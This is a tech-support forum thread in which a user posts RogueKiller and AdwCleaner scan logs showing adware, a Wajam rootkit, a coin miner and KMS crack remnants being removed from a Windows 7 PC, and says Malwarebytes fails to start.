[Root.Wajam (Malicious)] MGNiZ.sys [pillactechnology.com] -- %SystemRoot%\System32\drivers\MGNiZ.sys -> Deleted
[PUP.Gen1 (Potentially Malicious)] ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %_Betts_appdata%\Microsoft\Internet Explorer\Quick Launch\¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\¿ìÓÃÆ»¹ûÖúÊÖ.exe []) -> Deleted
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Deleted
[Adw.Wizzcaster (Malicious)] ins.exe -- %localappdata%\Temp\is-HS6LQ.tmp\ins.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\DRIVER~1.EXE []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Uninstall Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Uninstall Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\UNINST~1.EXE []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\¿ìÓÃÆ»¹ûÖúÊÖ\¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\¿ìÓÃÆ»¹ûÖúÊÖ.exe []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] жÔØ ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\¿ìÓÃÆ»¹ûÖúÊÖ\жÔØ ¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\unins000.exe []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Removed at reboot [2]
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Removed at reboot [2]
[PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine -- Yahoo! Search -> Deleted
 

Bruce Betts

TS Rookie
RogueKiller Anti-Malware V13.0.6.0 (x64) [Nov 1 2018] (Free) by Adlice Software
mail : https://adlice.com/contact/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Website : https://adlice.com/download/roguekiller/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : Betts [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Standard Scan, Delete -- Date : 2018/11/03 21:40:28 (Duration : 00:40:48)
Switches : -refid 3

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Delete ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] IEProtectDll64.dll -- %programdata%\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\IEProtectDll64.dll -> Unloaded
[VT.Detected (Malicious)] C:\Windows\Tasks\Opera scheduled Autoupdate 4086469641.job -- C:\Users\Betts\AppData\Roaming\Microsoft\Windows\icfgratf\bafcjfdr.exe -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458} -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\OSTotoSoft -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MppSvc -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\workframe -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\workframe -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUM.Desktop (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore|DisableSR -- 1 -> Deleted
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUP.AutoIt.Gen (Potentially Malicious)] RNullFix64.3XE -- %SystemDrive%\32788R22FWJFW\RNullFix64.3XE -> Deleted
[Root.Wajam (Malicious)] MGNiZ.sys [pillactechnology.com] -- %SystemRoot%\System32\drivers\MGNiZ.sys -> Deleted
[PUP.Gen1 (Potentially Malicious)] ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %_Betts_appdata%\Microsoft\Internet Explorer\Quick Launch\¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\¿ìÓÃÆ»¹ûÖúÊÖ.exe []) -> Deleted
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Deleted
[Adw.Wizzcaster (Malicious)] ins.exe -- %localappdata%\Temp\is-HS6LQ.tmp\ins.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\DRIVER~1.EXE []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Uninstall Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Uninstall Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\UNINST~1.EXE []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\¿ìÓÃÆ»¹ûÖúÊÖ\¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\¿ìÓÃÆ»¹ûÖúÊÖ.exe []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] жÔØ ¿ìÓÃÆ»¹ûÖúÊÖ.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\¿ìÓÃÆ»¹ûÖúÊÖ\жÔØ ¿ìÓÃÆ»¹ûÖúÊÖ.lnk (lnk => C:\Program Files (x86)\kuaiyong\unins000.exe []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Removed at reboot [2]
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Removed at reboot [2]
[PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine -- Yahoo! Search -> Deleted
 

Bruce Betts

TS Rookie
Hello! those are the logs for adwcleaner and rk
unfortunately, I'm unable to run malwarebytes. this window pops up after trying to run mbytes
Untitled.png
 

Bruce Betts

TS Rookie
# -------------------------------
# Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-10-31.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 11-03-2018
# Duration: 00:00:10
# OS: Windows 7 Professional
# Cleaned: 53
# Failed: 2


***** [ Services ] *****

Deleted LDRVSVC

***** [ Folders ] *****

Deleted C:\Program Files (x86)\SAALEPLUS
Deleted C:\ProgramData\DRIVERTALENT
Deleted C:\Users\Betts\AppData\Roaming\DRIVERTALENT
Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DRIVER TALENT
Deleted C:\Windows\Syswow64\SSL

***** [ Files ] *****

Deleted C:\Users\Betts\Desktop\Facebook.lnk

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKLM\Software\Wow6432Node\Classes\Interface\{349385B4-83FC-4BE1-9DBF-DC0195C65DB4}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{74009D24-8B75-4783-9E69-4566B239FB30}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{41AC4A66-D0C5-4646-BFAE-1041584C43DE}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{EC5A8488-566B-442C-9E5E-259031985B7A}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{39FB51B1-8784-4BD5-A411-F1B7A5DB4D67}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{BBA36C2E-EC79-494A-988D-19398D9222A2}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{54AFDC23-353C-4789-84F5-9C955AD44AC5}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{558F32DF-FA22-4656-B0D2-64DD9EB41F8F}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{F340A9AB-C377-4855-A106-0DAC2893A1A8}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{C3FD9F92-09FA-493C-8C1F-2A3D7DD55DDD}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{C8B204C2-D508-4B71-9CC5-AED5E1302A86}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{75CF0360-C187-4E6E-AB01-6FA65F3DA6CB}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{6BD95127-7C32-4C10-ACF0-1C4687629C85}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{FFC65EC8-C373-4E11-9882-905817219E16}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{9566B021-2079-4C32-8F1F-A26911954C8B}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{2203FA35-9590-4CBA-8AFF-CC53930B7F5C}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{4E695B8D-101C-4F95-B5C7-A7D9D2E975EF}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{3C8BE759-0A8F-4C0D-8CAD-0E5898EAE6AF}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{45C2D25B-0816-419A-B74B-CD4D7024FB71}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{1D7BEA54-B699-4A4D-83D7-D10875B8D7FD}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{0AD8FD27-9029-43A1-B9D5-C54FF18C3DD7}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{078FA2D5-DE68-416E-BA7F-894A4A4EAB6C}
Deleted HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\LemurLeap
Deleted HKLM\Software\Wow6432Node\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|DRIVERTALENT.EXE
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1
Not Deleted HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Deleted HKLM\Software\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
Deleted HKLM\Software\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
Deleted HKLM\Software\Wow6432Node\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
Deleted HKLM\Software\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\Stats\{C4BEF720-313C-420A-ACF6-77DD95D8F553}
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\Stats\{29494049-211F-4F5C-8545-7DA8BF7A6CF8}
Deleted HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{52300438-2215-426A-8181-FB18E65B2D4A}
Deleted HKLM\Software\EnigmaSoftwareGroup
